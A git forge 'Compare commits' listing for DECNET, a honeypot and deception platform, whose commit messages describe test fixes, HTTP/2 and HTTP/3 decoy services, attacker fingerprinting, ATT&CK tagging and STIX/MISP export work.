Compare commits

492 Commits

Author SHA1 Message Date
4586e36d63 fix(test/schema): pin xdist_group to prevent multi-server startup, cap workers at 4
Some checks failed
CI / Test (Standard) (3.11) (push) Has been skipped
CI / Test (Live) (3.11) (push) Has been skipped
CI / Merge testing → main (push) Has been skipped
CI / Lint (ruff) (push) Successful in 1m0s
CI / Dependency audit (pip-audit) (push) Failing after 1m2s
CI / SAST (bandit) (push) Successful in 1m11s
CI / Merge dev → testing (push) Has been skipped
2026-05-16 18:36:26 -04:00
8b3f74b39b fix(deps): pin urllib3>=2.7.0 to resolve CVE-2026-44431 and CVE-2026-44432 2026-05-16 18:26:47 -04:00
0fe9f895d0 feat(test): add test-schema target and SCHEMA_QUICK=1 mode for schemathesis
- Add dedicated test-schema Makefile target (xdist logical, 600s timeout,
  -m fuzz) so schemathesis runs separately from test-fuzz, which was
  spinning up competing uvicorn workers per xdist process
- Exclude all test_schemathesis*.py files from FUZZ_FLAGS via --ignore
- Add schema to _ALL_SUITES between api and fuzz
- Add SCHEMA_QUICK env var (default 0): caps every max_examples to 100
  across all four schemathesis files (4520 -> 600 total examples)
- Fix pre-push hook: use .311 venv and delegate to make test-all FAIL_FAST=0
  instead of hand-rolling five separate pytest invocations
2026-05-16 18:25:40 -04:00
ac332a6ba9 fix(live/mysql): use pytest_asyncio.fixture(loop_scope=module) on mysql_repo
@pytest.fixture on an async fixture ignores loop_scope, so mysql_repo
ran on the per-function loop while mysql_test_db_url's engine was bound
to the module loop — triggering 'Future attached to a different loop'.
2026-05-10 22:45:05 -04:00
e26876ee92 fix(makefile): add -m markers to live/docker/stress/bench targets 2026-05-10 22:43:33 -04:00
6a91858c15 fix(https-template): wire TLS_CERT/TLS_KEY into make_server ssl_context
Server read the env vars but never passed them to make_server, so it
served plain HTTP and the TLS handshake check timed out in live tests.
2026-05-10 22:39:24 -04:00
54dede5077 feat(makefile): add static analysis targets and xdist to SEQ_FLAGS
Add mypy, bandit, vulture, pip-audit as Makefile targets and include
them in test-all. Also enable -n logical on SEQ_FLAGS so live/api/stress
suites run in parallel where async-safe.
2026-05-10 22:37:30 -04:00
b41a7e3115 fix(live tests): use @pytest_asyncio.fixture for module-scoped async fixtures 2026-05-10 22:30:56 -04:00
ab18cd7797 fix(live tests): replace deprecated event_loop fixture with loop_scope="module" on async fixtures 2026-05-10 22:29:57 -04:00
0403cfc6a2 perf(pytest): switch xdist workers from -n 4 to -n logical 2026-05-10 22:28:04 -04:00
349f88252a chore: add Makefile with per-suite test targets; gitignore ATT&CK bundle and pytest dump 2026-05-10 22:27:54 -04:00
59d3351306 fix(fleet): strip digest from build_base tag before APT compatibility check; mark wizard done 2026-05-10 22:27:47 -04:00
80fff1efa4 fix(web): coerce fingerprint_type to string; sync frontend types and tests 2026-05-10 22:27:38 -04:00
a009746dd1 feat(fingerprint): extend syslog_bridge with HTTP/3 and JA4H fingerprinting emission 2026-05-10 22:27:22 -04:00
52f2f65fa3 fix(tests): fix stale asyncio.sleep patches and missing tarpit guards in service isolation tests
After the ingester._sleep alias fix, three tests in test_service_isolation.py
still patched `decnet.web.ingester.asyncio.sleep` (the old global-singleton
path). The ingester now calls `_sleep` directly, so those patches no longer
controlled the ingester's sleep — the worker looped with real asyncio.sleep
and the tests hung indefinitely.

Also: four API lifespan tests had no tarpit_watcher_worker patch, letting the
real tarpit task start. And test_api_survives_db_init_failure patched
`decnet.web.api.asyncio.sleep` (the singleton) instead of the existing
`_retry_sleep` alias.

Fixes:
- patch("decnet.web.ingester._sleep", ...) in the three ingester tests
- add tarpit_watcher_worker patch to all four api lifespan tests
- patch("decnet.web.api._retry_sleep", ...) in db_init_failure test
2026-05-10 22:10:54 -04:00
ff51ce55e2 fix(tests): eliminate tarpit OOM from global asyncio.sleep mock
Two interacting bugs caused asyncio.sleep to be mocked globally,
letting tarpit_watcher_worker spin the event loop on a non-async
mock and accumulate _increment_mock_call records without bound:

1. test_ingester.py patched `decnet.web.ingester.asyncio.sleep` via
   the asyncio singleton — any code in the process using asyncio.sleep
   (including the tarpit worker) hit the fake_sleep side_effect.
   Fix: add `_sleep = asyncio.sleep` alias in ingester.py and patch
   `decnet.web.ingester._sleep` instead — scopes the mock to ingester.

2. test_api_startup_guards.py called `_run_lifespan_startup` without
   DECNET_CONTRACT_TEST=true, which started the real tarpit task in a
   manually-constructed event loop that the tests never cancelled.
   Fix: set DECNET_CONTRACT_TEST=true inside _run_lifespan_startup so
   the lifespan skips all background workers.
2026-05-10 10:06:21 -04:00
a2c34cac02 fix(tests): prevent xdist worker OOM from leaked tarpit asyncio task
asyncio_default_fixture_loop_scope was 'module', so all async tests in
a module share one event loop. test_lifespan_startup_and_shutdown patched
log_ingestion_worker/log_collector_worker/attacker_profile_worker but not
tarpit_watcher_worker — the real while-True coroutine was created as an
asyncio task on the shared loop and never cancelled. The xdist worker ran
for 4+ hours (confirmed via py-spy + etime=04:48) consuming 15+ GB before
OOM-kill.

Fixes:
- Patch tarpit_watcher_worker in both TestLifespan tests
- Change asyncio_default_fixture_loop_scope to 'function' so each test
  gets its own loop; tasks cannot outlive their test
- Add loop_scope='module' to precision_engine which legitimately needs
  a module-scoped event loop
2026-05-10 09:53:25 -04:00
9a7b03700c refactor(intel): migrate AttackerIntel JSON-string columns to native SQLAlchemy JSON
Five list columns (greynoise_tags, abuseipdb_categories, threatfox_threat_types,
threatfox_ioc_types, threatfox_malware_families) and four dict columns
(*_raw) are now Column(JSON) with list/dict type annotations and
default_factory=list/dict. Providers return native Python objects; the
application-layer json.dumps/json.loads round-trip and _decode_json_list
helpers are gone. to_intel_event_payload() reads columns directly.

Also caps pytest xdist at -n 4 and excludes tests/api from norecursedirs
to prevent schemathesis workers from OOM-killing the dev loop.
2026-05-10 09:17:15 -04:00
de3634d739 feat(ttp): enable 6 xfail tests — evidence shape + tracing spans
- test_evidence_shape.py: replace broken (command, BehavioralLifter)
  pairing with correct (http_fingerprint, HttpFingerprintLifter) case;
  expand _LIFTER_CASES to 5-tuples with per-lifter payloads and rule
  factories; wire StubRuleStore + _index.install() per lifter; remove
  xfail marker — all 4 parametrized cases now pass

- factory.py: add _span() helper gated on _telemetry._ENABLED; wrap
  each per-lifter dispatch in _tag_one() that opens a
  ttp.lifter.{name} child span per call

- http_fingerprint_lifter.py: add missing name = "http_fingerprint"

- test_tracing.py: replace pytest.fail() stubs in
  test_lifter_child_spans_emitted and test_no_pii_canary_in_span_attributes
  with real test bodies; remove xfail markers
2026-05-10 08:51:07 -04:00
c39b63a431 test(ttp): enable test_dropped_intel_enriched_still_produces_intel_tags
Removes the E.3.14b xfail marker and writes the test body:
- _StubRepo gains get_attacker_intel_row_by_uuid(uuid) backed by an
  optional intel_rows dict; existing tests pass None (no catch-up, no
  change to their behaviour).
- The test drives a session.ended event with NO intel.enriched published,
  injects an AttackerIntel row into the stub repo, and asserts the
  tagger is called with source_kind='intel' carrying the correct payload
  fields (abuseipdb_score, greynoise_classification).
- Pins the asymmetry contract: email.received has no catch-up path
  (sibling test already green); intel does.
2026-05-10 08:30:44 -04:00
6e7020f2aa feat(ttp): implement E.3.14b intel catch-up via attacker.session.ended
On every attacker.session.ended event, the TTP worker now reads the
persisted AttackerIntel row (if any) and synthesizes an intel-source
TaggerEvent so intel-derived tags emit even when attacker.intel.enriched
was dropped or arrived before the worker started.

Key changes:
- AttackerIntel.to_intel_event_payload() — single source of truth for
  the intel-row → lifter payload projection; shared by future callers
  without importing decnet.intel.* (no-SPOF contract preserved).
- BaseRepository.get_attacker_intel_row_by_uuid() — returns the live
  SQLModel instance so the catch-up path can call to_intel_event_payload().
- _build_intel_catchup_event() in ttp/worker.py — looks up the intel row,
  builds the TaggerEvent, returns None on absent row (silence, not error).
- _process_event() extended: appends the catch-up event to tagger_events
  when topic contains "session.ended". Deterministic source_id keeps
  compute_tag_uuid idempotent across replays; INSERT OR IGNORE deduplicates
  against any prior attacker.intel.enriched path.

DummyRepo stub + coverage call added per feedback_run_base_repo_test.md.
2026-05-10 08:27:22 -04:00
471b33df1b feat(ttp): enable test_abuseipdb_score_30_dropped — impl was already done
Replace pytest.fail() stub with actual test body: constructs IntelLifter
with R0054, feeds score=30 payload, asserts confidence=0.21 (0.70×0.30)
which is below CONFIDENCE_FLOOR. xfail marker removed.

Corrects docstring: R0054 T1110 base_conf=0.70, not 0.85 as originally written.
2026-05-10 08:08:29 -04:00
39518e33b4 feat(ttp): implement evidence-shape validation and confidence range constraint
- TolerantTagger.tag validates evidence keys against EVIDENCE_SCHEMA TypedDicts;
  TypeError (programmer error) propagates instead of being swallowed
- IntelEvidence and EmailEvidence expanded from stubs to full per-provider
  key sets (total=False); IntelEvidence old stub fields replaced wholesale
- EVIDENCE_SCHEMA map added to models/ttp.py and imported by base.py
- TTPTag __table_args__ gains confidence [0,1] CheckConstraint (DB-enforced)
- xfail removed from test_confidence_outside_range_rejected_at_insert and
  test_evidence_shape_violation_propagates_as_typeerror — both now pass
- TypeError removed from _SWALLOWED_EXCS fuzz list; test_intel_evidence_keys
  updated to assert the real provider key set
2026-05-10 07:56:52 -04:00
a8f6a28f3a fix(test): pre-import decnet.cli at collection time to prevent agent-mode stripping
import decnet.cli as _decnet_cli at module level guarantees the app singleton is
built in master mode before any test can set DECNET_MODE=agent. Without this,
test_defence_in_depth_direct_call_fails_in_agent_mode triggered a fresh import
of decnet.cli with DECNET_MODE=agent active, which stripped master-only commands
and wrote the stripped module to sys.modules[decnet].cli — a parent-attribute
corruption that no sys.modules dict restore can fix.
2026-05-10 07:32:43 -04:00
8f6f56f481 fix(test): restore decnet.cli in sys.modules via monkeypatch to prevent agent-mode app stripping from leaking into subsequent tests 2026-05-10 07:18:50 -04:00
6fecf45dcd fix(orchestrator/tests): attribute access on TopologySummary, not dict
emailgen/scheduler.py: topology.email_personas/.language_default
test_heartbeat_topology_resync.py: row.needs_resync (5 occurrences)
2026-05-10 07:11:14 -04:00
4c8ef2f104 fix(orchestrator): _topology_personas accepts TopologySummary or dict 2026-05-10 07:08:39 -04:00
64610bf96e fix(tests): sync 4 tests to current production contracts
- SSH schema: add user + user_password fields (service extended post-test)
- TopologySummary: repo.get_topology() returns model now, not raw dict
- health live: tarpit_watcher added to get_background_tasks(), add to expected set
2026-05-10 06:48:42 -04:00
e4626879f6 perf(pytest): 194s → 4s collection — lazy heavy imports + norecursedirs
Four-part fix for the collection bottleneck that was blocking the dev loop:

1. Lazy mitreattack.stix20 import in attack_stix.py — deferred to first
   _load() call (TYPE_CHECKING guard at top level)

2. Lazy misp_stix_converter import in both MISP export routers — moved
   from module level into the route handler body

3. Lazy attack_catalog / attack_stix in ttp.py repo mixin — thin wrapper
   functions so the import chain never fires at module load time

4. tests/api/conftest.py — `from decnet.web.api import app` moved inside
   the `client()` fixture; `pytest_ignore_collect` broadened to skip all
   test_schemathesis*.py variants (not just test_schemathesis.py), which
   were launching a subprocess server at module-import time

5. pyproject.toml — `norecursedirs` for tests/live, tests/stress,
   tests/service_testing, tests/docker, tests/perf so these directories
   are never entered; `-m` filter removed from addopts (now redundant);
   `--dist loadscope` → `--dist load` to unblock workers immediately

6. behave_core / behave_shell rename — BEHAVE packages dropped the
   `decnet_` prefix; reinstalled editable installs and updated all 14
   import sites across profiler, ttp, bus, and correlation modules
2026-05-10 06:41:25 -04:00
f63aca4186 fix(test): reset _cached_backend before factory dispatch tests 2026-05-10 05:47:26 -04:00
95593cb804 fix(test): access DeckyRow.uuid as attribute, not dict key 2026-05-10 05:36:07 -04:00
16e032b7a5 fix(test): access LANRow.id as attribute, not dict key 2026-05-10 05:26:49 -04:00
967aec56d2 fix(bundle): prune node_modules during agent tarball walk 2026-05-10 05:17:32 -04:00
d3899dde96 fix(test): scrub DECNET_CORS_ORIGINS before domain-sections ini test 2026-05-10 05:17:00 -04:00
c2693aafc3 fix(clustering): filter extra fp keys before splatting into update_identity_fingerprints 2026-05-10 04:51:49 -04:00
92f43b4655 fix(fleet): update BASE_IMAGE test to allow digest-pinned image refs 2026-05-10 04:51:18 -04:00
f11def0af1 fix(collector): strip port from remote_addr before attacker identity resolution
host:port in remote_addr was creating a distinct Attacker row per TCP
connection instead of per IP. Split on the last ':' in parse_rfc5424;
preserve the port as fields['remote_port'] so repeated source ports are
retained as fingerprint signal in bounty payloads.
2026-05-10 04:06:42 -04:00
6a6f5807aa fix(pr3): adapt to quic-go v0.59.0 API — drop H3App, capture h3 SETTINGS via http3.Settingser
quic-go v0.59.0 (shipped with Caddy v2.11.2) removed quic.Connection as
a public interface and quic-go/logging as a public package, breaking
H3App's connection-wrapping approach.

Resolution:
- Remove H3App (h3app.go) entirely; Caddy handles h3 natively when h3
  is in the protocols list.
- Rewrite h3conn.go to keep only tryParseH3ControlStream + varint/name
  utilities (tested, useful for future stream-level tapping if the API
  ever re-exposes it).
- FPHandler.ServeHTTP: for h3 requests, type-assert ResponseWriter to
  http3.Settingser (the public interface exposed by quic-go/http3 v0.59),
  read the peer's Settings after ReceivedSettings channel closes, emit
  h3_settings fp record.
- https/entrypoint.sh: include h3 in CADDY_PROTOCOLS (Caddy now owns
  UDP/443); remove DECNET_H3_GLOBAL block.
- Update go.mod/go.sum to caddy v2.11.2 + quic-go v0.59.0.
- Update test_https_compose_h3_app.py to expect h3 in protocols when
  http/3 is selected, and assert decnet_h3 block is absent.
- All Go tests (9) and Python tests (15) remain green.
2026-05-10 03:43:34 -04:00
5675dd8ebc feat(pr3): canonical wire-order header capture for h1/h2 + H3App for SETTINGS
- Renames caddy.listeners.decnet_h2fp → decnet_fp; adds h1 raw-byte
  header capture (plainTappingConn) and h2 continuous HPACK decode loop
  (parseH2HeadersLoop) so headers_ordered reflects actual wire order, not
  Go map iteration order.
- Adds H3App Caddy module (decnet_h3) that owns UDP/443 via quic-go,
  wraps accepted QUIC connections with h3SettingsTappingConn to intercept
  the h3 control stream and extract RFC 9114 SETTINGS in wire order.
- Wires access_log emission from FPHandler.ServeHTTP via responseCapture.
- Updates syslog_bridge.py (canonical + per-service copies) with inline
  _compute_ja4h and new fp socket record branches: http_request_headers,
  h3_settings, access_log.
- Fixes ingester proto field alias (bridge emits 'proto', ingester expected
  'protocol') and exposes _process_fingerprint_bounties test alias.
- Go tests: h1/h2/h3 golden-byte tests all green; h3_tracer_test covers
  varint parser, GREASE detection, truncated-stream safety.
- Python tests: 15/15 green across bridge JA4H hash parity, ingester
  compat (old + new event shapes), and Caddyfile h3 template assertions.
2026-05-10 03:29:00 -04:00
8d1f26c0c7 fix(https): move Flask backend to 8443 to avoid netns conflict with http service on 8080 2026-05-10 02:31:08 -04:00
44ab42d80c fix(server): add from __future__ import annotations for Python <3.9 compat 2026-05-10 02:23:13 -04:00
d09b891a55 fix(syslog_bridge): add fp socket reader to canonical template — sync was overwriting per-service copies 2026-05-10 02:17:56 -04:00
42b5d97a50 fix(syslog_bridge): rewrite both templates with from __future__ annotations, fp socket imports, and start_fp_socket_reader 2026-05-10 02:06:53 -04:00
1669f25733 fix(syslog_bridge): add from __future__ import annotations for Python <3.9 compat 2026-05-10 01:58:43 -04:00
255ccebf29 fix(entrypoint): fail-fast if Flask does not bind within timeout instead of silently starting Caddy with no backend 2026-05-10 01:51:09 -04:00
d4f391bab1 fix(caddy): remove explicit tls from listener_wrappers — Caddy applies it by default 2026-05-10 01:45:03 -04:00
38cf1e6c6d fix(caddy+syslog): add UnmarshalCaddyfile to H2FP/FP handlers; add start_fp_socket_reader to syslog_bridge 2026-05-10 01:39:04 -04:00
6618b3c2a1 fix(topology): publish UDP/443 on gateway base when https service has http/3 enabled 2026-05-10 01:33:01 -04:00
7b54944fcc fix(https): remove ports from compose fragment — MACVLAN makes port publishing incompatible with network_mode 2026-05-10 01:29:46 -04:00
46963cbeec fix(deployer): chown synced _caddy_modules back to source owner after root copy 2026-05-10 01:26:13 -04:00
f2b0d286b3 fix(caddy): correct caddyhttp import path to modules/caddyhttp 2026-05-10 01:22:00 -04:00
f1ac1b4004 fix(deploy): sync _caddy_modules into http/https build contexts before compose up 2026-05-10 01:11:44 -04:00
3154224f68 fix(docker): hoist ARG BASE_IMAGE before first FROM so it scopes to all stages 2026-05-10 01:05:00 -04:00
724380901f fix(wizard): emit per-decky service config sections instead of prefix group
[decky.https] relied on ini_loader prefix-matching to propagate config
to decky-03/04/05 — silent and fragile. Now emits [decky-03.https],
[decky-04.https], [decky-05.https] explicitly so the INI is self-evident
and doesn't depend on pattern matching side-effects.
2026-05-10 01:00:43 -04:00
52a52eee78 fix(network): reload network before checking Containers on IPAM drift
networks.list() returns bare objects — Containers is always empty
without a reload(). The active-endpoint guard from the prior commit
never fired because it was checking a stale empty dict.
2026-05-10 00:56:56 -04:00
251181255b fix(network): reuse existing decnet_lan when active deckies are connected
Docker refuses network removal (403) when containers hold endpoints.
The old IPAM-drift path tried to disconnect+remove even with live
containers — disconnect silently failed, remove raised APIError.

Since DECNET assigns IPs explicitly in compose (never via Docker's
auto-assign pool), an ip_range mismatch on an existing same-driver
network is harmless. Bail out early and attach to the existing network
whenever Containers is non-empty.
2026-05-10 00:50:41 -04:00
92632d7afd feat(pr2): HTTP/2+HTTP/3 fingerprint extractors — JA4H, H2 SETTINGS, JA4-QUIC 2026-05-10 00:47:19 -04:00
0653e500b5 feat(services): HTTP/2 + HTTP/3 support via Caddy reverse-proxy
Swap Werkzeug for Caddy as the protocol layer for http and https decoy
services. Flask keeps owning app logic (fake_app, custom_body, headers,
syslog) on 127.0.0.1:8080; Caddy terminates h1/h2/h2c/h3 on the wire
with real-world TLS/QUIC fingerprints.

- Add `multi_enum` FieldType to ServiceConfigField + _coerce
- Add `http_versions` field to HTTPService (h1/h2c) and HTTPSService
  (h1/h2/h3); selecting h3 emits UDP/443 port mapping in compose
- Rewrite both Dockerfiles with multi-stage Caddy binary copy +
  setcap for port binding as the logrelay user
- Entrypoints parse HTTP_VERSIONS JSON, render a Caddyfile, start
  Flask in background, wait for it, then exec Caddy
- https/server.py drops direct TLS handling; Caddy owns the cert
- Add ProxyFix to both server.py so Flask sees real attacker IPs
- Frontend: multi_enum checkbox-group renderer in ServiceConfigFields;
  FormValue union extended to string[]; compactPayload skips []
- Fix stale test_smtp_relay_schema_matches_smtp: relay schema is a
  superset of smtp, not equal; update assertions accordingly
2026-05-10 00:04:37 -04:00
ec5b49144e fix(ui): transparent input bg fallback so light-mode text is legible 2026-05-09 23:24:37 -04:00
8dde954559 feat(ui): restyle LLMTab with DeckyFleet/PersonaGeneration form vocabulary 2026-05-09 23:23:25 -04:00
d1478f900c fix(ui): remove unused _SENTINEL from LLMTab 2026-05-09 23:21:29 -04:00
39eb1ce5db refactor(ui): move LLM provider config into Config tab, remove standalone route 2026-05-09 23:20:11 -04:00
c66749209f feat(ui): LLMConfig panel + route (/realism-llm) + nav entry 2026-05-09 23:15:27 -04:00
41b8e9b7b3 feat(realism/llm): GET/PUT /api/v1/realism/llm + worker hot-reload tick 2026-05-09 23:12:29 -04:00
155ab59ee8 feat(realism/llm): DB-backed LLMConfig, factory DB-first dispatch, Ollama HTTP mode 2026-05-09 23:09:36 -04:00
f10201e885 feat(secrets): Fernet encrypt/decrypt helper for DB-stored operator secrets 2026-05-09 23:07:24 -04:00
4c6b12dcf8 feat(stix_export): wire fingerprint bounties through all endpoints + tests
Remaining files from the fingerprint-bounties + characterizes-SRO commit:
misp_export, repository, bounties mixin, all 4 router endpoints, and test suite
updates. Prerequisite: previous commit added _extract_fingerprint_bounty_data
and the stix_export changes.
2026-05-09 09:14:48 -04:00
51d0fc7b6c feat(stix_export): HTTP quirks + JARM in protocol_fingerprints; characterizes SRO
Wire fingerprint bounties (JARM hashes, HTTP header quirks) from the bounties
table into the DecnetActorFingerprintExt.protocol_fingerprints group so the
sniffer/profiler-captured HTTP fingerprinting data surfaces in every STIX export.

Add a stix2.Relationship(relationship_type="characterizes") SRO linking each
x-decnet-behave-profile SDO back to its ThreatActor so graph-traversal tools
can follow the edge without relying on the bare x_decnet_behave_profile_ref
custom string property alone.

New repo surface:
- get_fingerprint_bounties_by_ip(ip) -> list[dict]
- get_all_fingerprint_bounties_for_export() -> dict[str, list[dict]]

All 4 export endpoints (per-attacker + fleet, STIX + MISP) extended with the
new gather slot. 50/50 tests green, mypy clean.
2026-05-09 09:14:29 -04:00
ef13e1fe4e test 2026-05-09 09:12:09 -04:00
97c99a4e03 feat(ttp): rich ThreatActor STIX extensions via CustomExtension + CustomObject
- stix_custom.py: DecnetActorFingerprintExt (@CustomExtension) wrapping
  network_behavior (os_guess/hop_distance/tcp_fingerprint/timing_stats/
  phase_sequence/behavior_class/beacon fields/tool_guesses) and
  protocol_fingerprints (ja3_hashes/hassh_hashes/kex_order_raw/
  ssh_client_banners/tls_cert_sha256/payload_simhashes/c2_endpoints).
  XDecnetBehaveProfile (@CustomObject x-decnet-behave-profile) carrying
  full BEHAVE-SHELL observation envelopes + kd_digraph_simhash.
  FINGERPRINT_EXT_DEF singleton extension-definition SDO.
- Drop legacy flat x_decnet_ja3_hashes / x_decnet_hassh_hashes /
  x_decnet_c2_endpoints (pre-v1, no consumers).
- stix_export: _threat_actor() wired to behavior + observations;
  build_attacker_bundle/build_fleet_bundle grow observations parameter.
- Repo: list_observations_by_attacker + get_all_observations_for_export
  abstract + sqlmodel impl; all four export endpoints extended.
- 18 new tests; inter-DECNET round-trip (stix2.parse → typed objects)
  is the primary fidelity assertion.
2026-05-09 08:52:19 -04:00
1200ac9132 feat(stix): STIX→MISP download export (per-attacker + fleet)
Adds GET /api/v1/attackers/{uuid}/export/misp and
GET /api/v1/attackers/export/misp backed by misp_export.py, which
converts existing STIX bundles to MISP events via misp-stix
ExternalSTIX2toMISPParser. Fleet endpoint emits {response:[...]}
collection (one event per attacker). Frontend: STIX/MISP buttons on
AttackerDetail header and Attackers list. 13 new tests green.
2026-05-09 08:04:25 -04:00
8990d9321d fix(ttp/stix): add Sighting SRO per process execution to link commands to threat-actor 2026-05-09 07:47:44 -04:00
d6a091be75 fix(ttp/stix): extract commands from both 'command' and 'command_text' keys 2026-05-09 07:43:44 -04:00
e548be3c49 feat(web): wire EXPORT button to fleet STIX endpoint 2026-05-09 07:40:07 -04:00
c210a56fc8 feat(ttp/stix): fleet-wide STIX 2.1 export — GET /api/v1/attackers/export/stix 2026-05-09 07:37:41 -04:00
f827197cc8 feat(ttp/stix): add deduped process SCOs for attacker commands 2026-05-09 07:33:30 -04:00
1ee7a4a481 fix(ttp/stix_export): _aware() handles ISO string timestamps from DB 2026-05-09 07:26:48 -04:00
915bc6d7ef feat(web): add Download STIX button to AttackerHeader 2026-05-09 07:24:59 -04:00
fe0ed4a251 feat(ttp): STIX 2.1 bundle export for individual attackers
GET /api/v1/attackers/{uuid}/export/stix returns a self-contained STIX
2.1 bundle: ip observation, threat-actor, ATT&CK attack-patterns with
canonical MITRE IDs, uses relationships, per-tag sightings, file SCOs
for artifacts, domain-name SCOs for SMTP targets, and a provider intel
note. Attack-pattern SDOs carry the MITRE bundle IDs so consumers
deduplicating against the public ATT&CK bundle get exact matches.
2026-05-09 07:21:22 -04:00
c4d6eb5bb3 feat(web): mitre_url deeplinks + lazy groups subpanel in TTPInspector
Every technique_id in TechniqueBar and TTPInspector now links to its
canonical attack.mitre.org page. The inspector drawer gains a GROUPS
subpanel that lazy-fetches the new /ttp/techniques/{id}/groups endpoint
and renders each MITRE-tracked intrusion-set with deeplink and aliases.

Centralizes TTP row interfaces into src/types/ttp.ts and API wrappers
into src/utils/ttpApi.ts to give the new GroupRef type a clean home and
avoid a third inline fetch declaration.
2026-05-09 06:57:10 -04:00
1d3086a5c7 feat(web): GET /api/v1/ttp/techniques/{id}/groups — MITRE-tracked groups using a technique
Surfaces the intrusion-set reverse index from the loaded ATT&CK
bundle: given a technique, returns the list of groups MITRE has
documented as using it. Read-only — explicitly NOT an attribution
claim about a DECNET attacker. The frontend pulls this lazily when
the operator expands a technique panel; payload-size cost on every
TTPTagDetailRow makes embedding wasteful for techniques with 50+
documented groups.

- decnet/web/router/ttp/api_get_groups_for_technique.py exposes
  GET /api/v1/ttp/techniques/{technique_id}/groups, response_model
  list[GroupRef]. Same JWT-viewer auth gating as the rest of the
  TTP router. 404 when the technique_id doesn't resolve in the
  bundle.
- Sub-techniques are queried directly (no auto-union with parent)
  to match ATT&CK Navigator semantics; callers that want a broader
  view query the parent themselves.
- tests/ttp/test_groups_for_technique.py covers happy path, 404,
  sub-technique attribution independence, empty-list-on-zero-groups,
  and that responses include mitre_url + aliases.
- tests/web/test_api_attackers.py: fix pre-existing fixture drift
  introduced by a2a61b63 — three TestGetAttackerDetail cases were
  missing AsyncMock for repo.latest_observation_per_primitive,
  causing TypeError on await of MagicMock. The new groups endpoint
  doesn't share code with attacker_detail; this is a drive-by fix
  surfaced by the same suite run.
2026-05-09 06:45:25 -04:00
84a075e405 feat(ttp): promote mitre_url to first-class TTPTag column + propagate everywhere
Phase 2 attached mitre_url to intel-emitted tags' evidence JSON;
Phase 3 promotes it to a real column populated for *every* tag —
intel, credential, behavioral, canary, identity, email, rule-engine —
from one source. Pre-v1, so the SQLModel field is added directly
without an Alembic migration.

- TTPTag gains mitre_url: Optional[str] (not indexed — derived
  deeplink, not a query target; technique_id is already indexed).
- _emit.py and rule_engine._evaluate_rules both populate mitre_url
  via attack_stix.mitre_url_for(sub_technique_id or technique_id).
  Sub-technique URL when present, else parent. The two construction
  sites stay separate because the rule_engine path carries per-emit
  span instrumentation that emit_tags() can't preserve without
  threading a span object through; minimal-change beats forced
  refactor here.
- intel_lifter strips mitre_url from evidence_extra in all four
  decision functions. The column is canonical now; duplicating in
  the JSON column would drift when the bundle moves. The unused
  TechniqueEmission import + tracking dicts removed too.
- IdentityTechniqueRow / TechniqueRollupRow / TTPTagDetailRow /
  CampaignTechniqueRow gain mitre_url: Optional[str].
- sqlmodel_repo/ttp.py:_mitre_url_for added; the 5 row-builder sites
  pass mitre_url=_mitre_url_for(sub_technique_id or technique_id)
  alongside the existing technique_name resolution.
- api_get_tag_details.py needs no change — list_tags_by_scope_and
  _technique already returns model_dump() rows that flow the new
  column through **row spread to TTPTagDetailRow.
- tests/ttp/test_emit_attaches_mitre_url.py covers both construction
  paths (top-level, sub-tech, unknown, multi-emit) and a regression
  test that intel_lifter evidence dicts no longer contain mitre_url.
2026-05-09 06:40:08 -04:00
9675f4bf92 refactor(decnet_web/MazeNET): bump coverage floor after Inspector split
Suite is now 51 files / 259 tests, 25.68% lines / 21.43% branches.
Floor: lines 24->25, functions 21->22, branches 19->21,
statements 23->24. Inspector/index.tsx ends at 172 LOC, the only
other > 250 LOC file in MazeNET/ is NodeInspector (362) — the
node branch was the bulk of the original 606 LOC and its 7
add-service / tarpit form states stay co-located there.
2026-05-09 06:34:02 -04:00
4fbce6a8b0 refactor(decnet_web/MazeNET): split Inspector by selection type
Inspector.tsx (606 LOC) splits into Inspector/{NetInspector,
NodeInspector, EdgeInspector, ServiceInspector, index}.tsx plus
types.ts. The dispatcher (index.tsx) owns the title bar, the empty
state, the activeNetIds derivation, the pending-diff block, and the
topology-status block; each per-type panel takes only the props it
needs. NodeInspector keeps the 7 useStates for the add-service /
tarpit forms since they are node-only.

10 new dispatcher-level tests cover empty / node / net / edge /
service / observed-entity / internet-net / live-ops gating /
tarpit-controls / pending-diff. Selection type re-exported from
Inspector/index.tsx so MazeNET.tsx, Canvas.tsx, and
useMazeContextMenu.tsx keep their existing import path.
2026-05-09 06:33:12 -04:00
e50474cb66 feat(ttp): add mitre_url_for + groups_using_technique helpers
Two reusable bundle-derived lookups that the next two commits build
on:

- mitre_url_for(tid) returns the canonical attack.mitre.org URL by
  reading external_references on the cached attack-pattern. Backed
  by the existing lru-cached _attack_pattern_by_id so per-call cost
  is constant. Handles top-level techniques and sub-techniques
  (T1059.004 -> .../techniques/T1059/004).
- GroupRef + groups_using_technique(tid) surface the intrusion-set
  reverse index from the loaded bundle: given a technique, return
  the MITRE-tracked groups documented as using it. Sorted by
  group_id for deterministic responses; lru-cached. Sub-technique
  semantics match ATT&CK Navigator (do NOT auto-union with parent).
- decnet/ttp/data/intel_loader._mitre_url_for collapses to a thin
  re-export of attack_stix.mitre_url_for; the loader keeps mitre_url
  on TechniqueEmission for the eventual STIX export.
- tests/ttp/test_attack_url.py covers both helpers: top-level + sub
  URLs, unknown -> None / (), GroupRef immutability + hashability,
  deterministic ordering, sub-technique distinct from parent.
2026-05-09 06:32:04 -04:00
0a9a2f9021 refactor(decnet_web/AttackerDetail): trim shell + bump coverage floor
Drop unused icon/api/useEffect/Tag imports left behind by the
fingerprint, behaviour, and IntelPanel extractions. AttackerDetail.tsx
ends at 450 LOC across Phase 10 (down from 1652 / 73% reduction).
Coverage floor: lines 23->24, functions 20->21, branches 17->19,
statements 22->23.
2026-05-09 06:29:15 -04:00
4bd502d3bf refactor(decnet_web/AttackerDetail): lift IntelPanel
Move IntelPanel + IntelRow type + ProviderRow + VERDICT_TONE/fmtTs
helpers into AttackerDetail/IntelPanel/. AttackerDetail.tsx drops
from 680 to 449 LOC. New IntelPanel.test.tsx covers the loading,
absent (404), error (500), and ok states with MSW handlers.
2026-05-09 06:27:59 -04:00
e92d415304 refactor(decnet_web/AttackerDetail): lift behaviour panel block
Move BehaviouralPrimitivesPanel + 8 sub-components (BehaviorHeadline,
BeaconBlock, DetectedToolsBlock, TcpStackBlock, TimingStatsBlock,
PhaseSequenceBlock, AttributionBadge, KeyValueRow, StatBlock) plus
the OS_LABELS / BEHAVIOR_LABELS / TOOL_LABELS / BEHAVIOUR_DOMAIN_*
lookup tables and fmtOpt/fmtSecs into AttackerDetail/behaviour/.
AttackerDetail.tsx drops from 1220 to 680 LOC; existing
